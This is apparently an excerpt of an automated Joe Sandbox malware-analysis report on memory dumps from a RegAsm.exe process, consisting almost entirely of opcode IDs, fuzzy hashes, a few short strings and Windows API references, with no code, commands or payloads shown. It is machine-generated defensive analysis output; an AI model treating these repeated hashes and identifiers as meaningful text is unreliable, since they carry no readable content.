                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0e3c9d9c3e3238000ac5c7ad2870d127f6ee53af7db61a90bc7b6d5a7a5b48ee
                                    • Instruction ID: 78fb9690bd85a222ec7469cab0982f5af150a12539bba1f05dbbf7de10c1f4c3
                                    • Opcode Fuzzy Hash: 0e3c9d9c3e3238000ac5c7ad2870d127f6ee53af7db61a90bc7b6d5a7a5b48ee
                                    • Instruction Fuzzy Hash: 41C1D374E01218CFDB54EFA5C984BADBBB2BF89300F1085A9D809AB355DB359E85CF50
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a4c3edd697c7e7e98f6ff263a59531d49a12f4c4148f7de3108285b0046a9f9a
                                    • Instruction ID: d49d4fbbf703abc3d1960d16899469bdbbcadd66074634ab4f3154d8dc993408
                                    • Opcode Fuzzy Hash: a4c3edd697c7e7e98f6ff263a59531d49a12f4c4148f7de3108285b0046a9f9a
                                    • Instruction Fuzzy Hash: B7C1C274E00218CFDB54EFA5D954B9DBBB2BF89300F1084A9D809AB355DB355E85CF50
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 5143fa8e45d6ab7d67a4c28e0361e73b8dfba5a7424eb786dc46c6513ebcf378
                                    • Instruction ID: 2ff4171f27ae3f5928e85ff250983c433139dfb56254af3eac02f568156d3a0e
                                    • Opcode Fuzzy Hash: 5143fa8e45d6ab7d67a4c28e0361e73b8dfba5a7424eb786dc46c6513ebcf378
                                    • Instruction Fuzzy Hash: 03C1D274E00218CFDB54EFA5C984B9DBBB2BF89304F1084A9D819AB365DB359E85CF50
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d38fda8d5fbd97efb7ebbb18c581b3a649d364c8d41eb8e5faf6920997077300
                                    • Instruction ID: 1abf74b298f58841f09104ff901da7d64765938d9f301b94aa1b4a7767d74a61
                                    • Opcode Fuzzy Hash: d38fda8d5fbd97efb7ebbb18c581b3a649d364c8d41eb8e5faf6920997077300
                                    • Instruction Fuzzy Hash: D9C1CF74E00218CFDB54EFA5D984BADBBB2BF89300F1084A9D809AB355DB359E85CF50
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0191b8a83723f1bb7e9ee5c0dece16910ab456bb59f6d701ebcdc743b99081d3
                                    • Instruction ID: 59261c504804ea8b4093d5aca511633bfae4fbeb91ba367043935137573bd007
                                    • Opcode Fuzzy Hash: 0191b8a83723f1bb7e9ee5c0dece16910ab456bb59f6d701ebcdc743b99081d3
                                    • Instruction Fuzzy Hash: EAC1D374E00218CFDB54EFA5D984B9DBBB2BF89300F2084A9D809AB355DB359E85CF50
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f8872cfd31732ed13e90ab19b3e221fdc32e00d8ca57a654e44541de82a866f9
                                    • Instruction ID: 18c87f929bf6b5298933a0e05bcdfbcf0f6a45e61bbbd1c6171dc3df3291d5c4
                                    • Opcode Fuzzy Hash: f8872cfd31732ed13e90ab19b3e221fdc32e00d8ca57a654e44541de82a866f9
                                    • Instruction Fuzzy Hash: 79C1C274E00218CFDB54EFA5C994B9DBBB2BF89300F1084A9D809AB395DB355E85CF50
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 1974240ba4180cc1c7ef011a1b60ce2b35e15a58112bba71c3dc5a5b179761d0
                                    • Instruction ID: 80457998a5cb5d834fad888eb9c669cfe870c8800c4ced5019a3dd7cdc6a0d38
                                    • Opcode Fuzzy Hash: 1974240ba4180cc1c7ef011a1b60ce2b35e15a58112bba71c3dc5a5b179761d0
                                    • Instruction Fuzzy Hash: 4BC1B074E00218CFDB54EFA5C984B9DBBB2BF89300F1085A9D819AB355DB355E85CF50
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0792d9b9560077800d8d140f603e2d5a0da5b35cb6f0db85113993361dccf586
                                    • Instruction ID: d6f047143137a0fba28c3a5ccd51abcc028c70966d615e54a2797eaeb63e8d6a
                                    • Opcode Fuzzy Hash: 0792d9b9560077800d8d140f603e2d5a0da5b35cb6f0db85113993361dccf586
                                    • Instruction Fuzzy Hash: 81C1D374E00218CFDB54EFA5C984BADBBB2BF89300F1085A9D819AB355DB355E85CF50
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2af416f09c5405acf84520ff6c313c871d076777eea3a28b7c0c3c1a850e57a6
                                    • Instruction ID: 9d8df09df1954019046e3bb5bb0765cbafbd1d1f4e36067085de6b0ba9fb9e2f
                                    • Opcode Fuzzy Hash: 2af416f09c5405acf84520ff6c313c871d076777eea3a28b7c0c3c1a850e57a6
                                    • Instruction Fuzzy Hash: 79C1D274E00218CFDB54EFA5C984BADBBB2BF89304F1084A9D809AB355DB359E85CF50
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 6eac4cdc05ba151f05ab20c171de5a3807affae62b92a0d87a006966768a2d16
                                    • Instruction ID: c656a76a46381a47bc32afab05c143ded337411f0b9df95806531ec8cd20d1fc
                                    • Opcode Fuzzy Hash: 6eac4cdc05ba151f05ab20c171de5a3807affae62b92a0d87a006966768a2d16
                                    • Instruction Fuzzy Hash: 77C1B074E00218CFDB54EFA5C984BADBBB2BF89300F1084A9D809AB355DB359E85CF50
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4842ab475a1d9a9aa3087ced6aed56e49740604113757649b59e824ef105af9d
                                    • Instruction ID: 671f7e8023aa21cea889140d63875e3932c32fcb2cdda761a4335e100821f7e6
                                    • Opcode Fuzzy Hash: 4842ab475a1d9a9aa3087ced6aed56e49740604113757649b59e824ef105af9d
                                    • Instruction Fuzzy Hash: 2CC1D274E00218CFDB54EFA5D994BADBBB2BF89300F1080A9D809AB355DB359E85CF50
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 1188c216646a6c53ca54b93451568bd8a37f6b9684e9c06cc58b4633936ce011
                                    • Instruction ID: afd98b673b9195f0eceac137c25215fb41cbd1d0af4eda73bfe64285430c6dbd
                                    • Opcode Fuzzy Hash: 1188c216646a6c53ca54b93451568bd8a37f6b9684e9c06cc58b4633936ce011
                                    • Instruction Fuzzy Hash: EAC1D274E00218CFDB54EFA5D984B9DBBB2BF89304F1084A9D809AB365DB359E85CF50
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3220892692.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_f60000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: c03572b6128da3225ed8230fb3e0658503717dde6ca8959cc89cf2a07271a917
                                    • Instruction ID: 7d5731740663fec6a1ecd132b2f8eb253cff8c588231bcbfc5367a7e2b7c470b
                                    • Opcode Fuzzy Hash: c03572b6128da3225ed8230fb3e0658503717dde6ca8959cc89cf2a07271a917
                                    • Instruction Fuzzy Hash: 0DA10470D00218CFDB14DFA8C984BDDBBB1FF88314F24826AE409AB2A1DB749985CF51
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3220892692.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_f60000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a207074634f21d65b0c2f5795d1be3625421786c4fd885126e3df501bdde99e3
                                    • Instruction ID: ecc24d51e0cedccf051591a35397179d1358aac1d78d54f0abbbc6b05bd220f8
                                    • Opcode Fuzzy Hash: a207074634f21d65b0c2f5795d1be3625421786c4fd885126e3df501bdde99e3
                                    • Instruction Fuzzy Hash: E6A10470D00218CFDB14DFA9C984BDDBBB1FF88314F24966AE409AB2A1DB749985CF51
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3220892692.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_f60000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 058575d40a0493e3bbaf60f7562a276f51a0fc2b1a3585502cdcd04b82b597f4
                                    • Instruction ID: 630cfc67b463370ca33d8e37bc8e93cca07417777b95213389a61a32e163c2a7
                                    • Opcode Fuzzy Hash: 058575d40a0493e3bbaf60f7562a276f51a0fc2b1a3585502cdcd04b82b597f4
                                    • Instruction Fuzzy Hash: 7091F270D00218CFDB10DFA8C888BDDBBB1FF49310F24966AE409AB292DB759985DF55
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 572ccdc427d1ac95ba1c3e348d36cbd3eec0c1631f66696152be280f36e654f4
                                    • Instruction ID: bf5f820502c9b32c1a63497f4cad6a56a41e7bc073bc0c9709566f6502186504
                                    • Opcode Fuzzy Hash: 572ccdc427d1ac95ba1c3e348d36cbd3eec0c1631f66696152be280f36e654f4
                                    • Instruction Fuzzy Hash: 1A810574E012088FDB54EFAAD9906DDBBF2BF88310F64C529E414AB399DB359942CF50
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 5862956b1ca22faa7c9b728c95b94c687dc6d07b90c260d3e8ac76b9f9420b13
                                    • Instruction ID: 618246609d73786e6c0ed53f4dcc88388c8b349958b8386921d3220e7136d6fd
                                    • Opcode Fuzzy Hash: 5862956b1ca22faa7c9b728c95b94c687dc6d07b90c260d3e8ac76b9f9420b13
                                    • Instruction Fuzzy Hash: E241F670D01208CFDB58EFAAD95469EBBB2BFC8300F20C56AD418AB355DB345946DF50
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 50418ea02713fddb838a0dc7d59d6bb9a0488f30c86dbefc42b94831eada0208
                                    • Instruction ID: 2e11a69b1862de630cdec625da038c7228f7cda5a37840025d1e4a4cc9ef7e8c
                                    • Opcode Fuzzy Hash: 50418ea02713fddb838a0dc7d59d6bb9a0488f30c86dbefc42b94831eada0208
                                    • Instruction Fuzzy Hash: 59411670E012488FDB58DFB6D94469EFBB2AFC9304F24C16AD418AB395DB385946CF50
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 43e74f288b198fa02f316c90588093135bfe7829c205ca7865ffc639e8ddb4c1
                                    • Instruction ID: 95762d74f2bf8168d4bc0850f3e6656c327bd707e2ea4b5e6473cbe265f2ce4d
                                    • Opcode Fuzzy Hash: 43e74f288b198fa02f316c90588093135bfe7829c205ca7865ffc639e8ddb4c1
                                    • Instruction Fuzzy Hash: 3141E270E012489FDB58DFBAC84469EFBF2BF89300F24C12AD418AB2A5DB355946CF40
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a4d147b9adf3185dcc3f2415c849442651a8f5ec619f23ac76d3b8ff6abcbd35
                                    • Instruction ID: 18cdd89250b38f21f07f7f184cfbd15a036dcf341b6ea9bb8270b879db20b6bf
                                    • Opcode Fuzzy Hash: a4d147b9adf3185dcc3f2415c849442651a8f5ec619f23ac76d3b8ff6abcbd35
                                    • Instruction Fuzzy Hash: C741E374E012488FDB58DFAAD9446DEBBF2AF89300F24C12AD418AB365DB355946CF50
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2b81bd726900d7d5eb7497552efbdbd121a056861acfff8a051d88e78e747173
                                    • Instruction ID: 1e8b105bbcf62a09790b7fd427ea865fc59bcb3ba1bb60a0981f90389c310b05
                                    • Opcode Fuzzy Hash: 2b81bd726900d7d5eb7497552efbdbd121a056861acfff8a051d88e78e747173
                                    • Instruction Fuzzy Hash: 7141C570E01208CBEB58DFAAD94469EFBF2AF88300F24C12AD419BB255DB355946CF50
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 5be386812b332360355d7437b2397adab82b1e3ef9613fb0abc553bcfd2e7894
                                    • Instruction ID: 27fcb158d3f7f5e1811c5d9f51e7b0a33572f92a723e0e47461a47aa8cd6e809
                                    • Opcode Fuzzy Hash: 5be386812b332360355d7437b2397adab82b1e3ef9613fb0abc553bcfd2e7894
                                    • Instruction Fuzzy Hash: 7641D670D012088BEB58DFAAD9507DEFBF2AF89304F64C12AD418AB255EB355946CF50
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 9c5b8a43a9c94017ff3e3bfe7fd4f062796ee9d592ce2c642ec8a30fad8e1a66
                                    • Instruction ID: 32f8d5f1dc169564b373eba8de24e11f7d75a918c31702980eef20bf3f292439
                                    • Opcode Fuzzy Hash: 9c5b8a43a9c94017ff3e3bfe7fd4f062796ee9d592ce2c642ec8a30fad8e1a66
                                    • Instruction Fuzzy Hash: 9E41E5B0D01248CBDB58DFAAD85479EFBB2AF88300F64C12AD418BB255DB345946CF50
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 64844e0a8b3c00b7cbd05112fa83831fc1a5e3bc9dff2e5ea3e67d8fbdac4f28
                                    • Instruction ID: 913f518906907e2a9a34ef2e33157dcfef4740e1cb0bd1be110b89b27c5926e9
                                    • Opcode Fuzzy Hash: 64844e0a8b3c00b7cbd05112fa83831fc1a5e3bc9dff2e5ea3e67d8fbdac4f28
                                    • Instruction Fuzzy Hash: EE41E5B0E002488BEB58DFAAD9547DEFBF3AF88304F20C12AD418AB255DB355946CF50
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 8da4259963e6aa6126138ceff89f47d8843f26f78238b5a7cf06de494b7da4ea
                                    • Instruction ID: daa1c5dda810d885d4dcc3633a07226969d5c2685975e3249c64042cf4899899
                                    • Opcode Fuzzy Hash: 8da4259963e6aa6126138ceff89f47d8843f26f78238b5a7cf06de494b7da4ea
                                    • Instruction Fuzzy Hash: 3241C571D012088FEB58DFAAD95479EFBF2AF88304F24C12AD418BB295DB355946CF50
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 8af37897185ef870af574086bcbcef01aecaad6ee197c168193dbd3b17267bd4
                                    • Instruction ID: 7ea7a1d5591a1ef88212d5d99c5ef32be45a2d8c0b5469782a3a81bd142db353
                                    • Opcode Fuzzy Hash: 8af37897185ef870af574086bcbcef01aecaad6ee197c168193dbd3b17267bd4
                                    • Instruction Fuzzy Hash: 0E41E5B0E012488FEB58DFAAD9506DEFBF2AF89304F20C12AD418AB255DB355946CF50
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: bffa3c578b4cb0210bad0ca0908f44cc77b75ffe8abe30d67b39da70032b524c
                                    • Instruction ID: 33e8c29435258ddca2917245b03c643813d64915ea4134e16ea6b87d85fcd660
                                    • Opcode Fuzzy Hash: bffa3c578b4cb0210bad0ca0908f44cc77b75ffe8abe30d67b39da70032b524c
                                    • Instruction Fuzzy Hash: 8C41D571E01208CFDB58DFAAD9446DEBBF2AF88304F24C12AD418BB255EB345946CF50
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: c57d3f8c7f3e8b3be7330f399f79589da873f07e0bfc8a33e5d8ae44ea1c138d
                                    • Instruction ID: 2d16005d6006152fb66e81ec68f9bc3b2f4806f58014c5f02929fa81be0fc158
                                    • Opcode Fuzzy Hash: c57d3f8c7f3e8b3be7330f399f79589da873f07e0bfc8a33e5d8ae44ea1c138d
                                    • Instruction Fuzzy Hash: 4941E570E01208CFEB58DFAAD95069EFBF2AF89304F20C12AD418BB255DB345946CF40

                                    Control-flow Graph (rendered graph; node and edge data not reproduced)
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: LR]q$LR]q
                                    • API String ID: 0-3917262905

                                    Control-flow Graph (rendered graph; node and edge data not reproduced)
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: ,aq$,aq
                                    • API String ID: 0-2990736959

                                    Control-flow Graph (rendered graph; node and edge data not reproduced)
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: Haq$Haq
                                    • API String ID: 0-4016896955
                                    APIs
                                    • KiUserExceptionDispatcher.NTDLL ref: 00F64D86
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3220892692.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_f60000_RegAsm.jbxd
                                    Similarity
                                    • API ID: DispatcherExceptionUser
                                    • String ID:
                                    • API String ID: 6842923-0
                                    APIs
                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0616F8BE,?,?,?,?,?), ref: 0616F97F
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223373192.0000000006160000.00000040.00000800.00020000.00000000.sdmp, Offset: 06160000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6160000_RegAsm.jbxd
                                    Similarity
                                    • API ID: DuplicateHandle
                                    • String ID:
                                    • API String ID: 3793708945-0
                                    APIs
                                    • LdrInitializeThunk.NTDLL(00000000), ref: 00F68DE7
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3220892692.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_f60000_RegAsm.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Instruction ID: fc4bbca8b29175782c0a5c14510b1edb740d68afefd2dadfd0e96470e2380c80
                                    • Opcode Fuzzy Hash: 733f131ba040c865a81849180e8cfe6b7f3643a1e53235ac2c31b25917df494e
                                    • Instruction Fuzzy Hash: 5D319031A402199FCF45AF64D844AAE3BA6FF88340F014424F9158B294CB36DD61EBE1
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3220610378.0000000000F0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F0D000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_f0d000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d3679da1ea2b34da6325e1e05433024cf5449d7a619e65ac82a933885c70ceaa
                                    • Instruction ID: 496ba005886ba0a4789705503452c840d74ce236f4ec203026e9c529cccbd0f2
                                    • Opcode Fuzzy Hash: d3679da1ea2b34da6325e1e05433024cf5449d7a619e65ac82a933885c70ceaa
                                    • Instruction Fuzzy Hash: 6921677A500244DFCB05CF94C9C0F26BF65FB94324F20C569E9090B296C33AE846F7A2
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 63993fbfa438d411deb63aeafac26b959717b7b288689fe2c68dbbadb7c8a530
                                    • Instruction ID: d361dbe59e0c256c416d8b11d2888231ee61d36a0a8bd8d11170007ea93e5295
                                    • Opcode Fuzzy Hash: 63993fbfa438d411deb63aeafac26b959717b7b288689fe2c68dbbadb7c8a530
                                    • Instruction Fuzzy Hash: 9721AE35B056218FC769AB28C85462AF7A6ABC87517054568E90ACF354CF34DC02CBC0
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3220679580.0000000000F1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F1D000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_f1d000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: bade5f22eaa55d1b2626c158cc025f6fdfb97ae1fd15470a523ba91a53152867
                                    • Instruction ID: 85dfea53792baec30a8169a167f3fe2c93ad766ec4bf7539c475a997c3ac4ec7
                                    • Opcode Fuzzy Hash: bade5f22eaa55d1b2626c158cc025f6fdfb97ae1fd15470a523ba91a53152867
                                    • Instruction Fuzzy Hash: F2213471904204DFCB14DF14D9C0F26BBB5FB88324F24C66DD80A4B25AC33AD887EA62
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3220679580.0000000000F1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F1D000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_f1d000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 35ab005a9a2469649bfd5fd403412d29ca2052c8998bc5485cfec6887be8b775
                                    • Instruction ID: 9da5d128fb3a30baa533b266b2d195c5149596db764a384c6b52686cb829088c
                                    • Opcode Fuzzy Hash: 35ab005a9a2469649bfd5fd403412d29ca2052c8998bc5485cfec6887be8b775
                                    • Instruction Fuzzy Hash: 3D215C7150D7C09FCB07CB24D994711BF71AB46224F29C5DBD8888F2A7C23A984ADB62
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 83ebdfeed0898e468cf15762842cfb1cf7dbbe5e5b8513d14c7b4da6ee454615
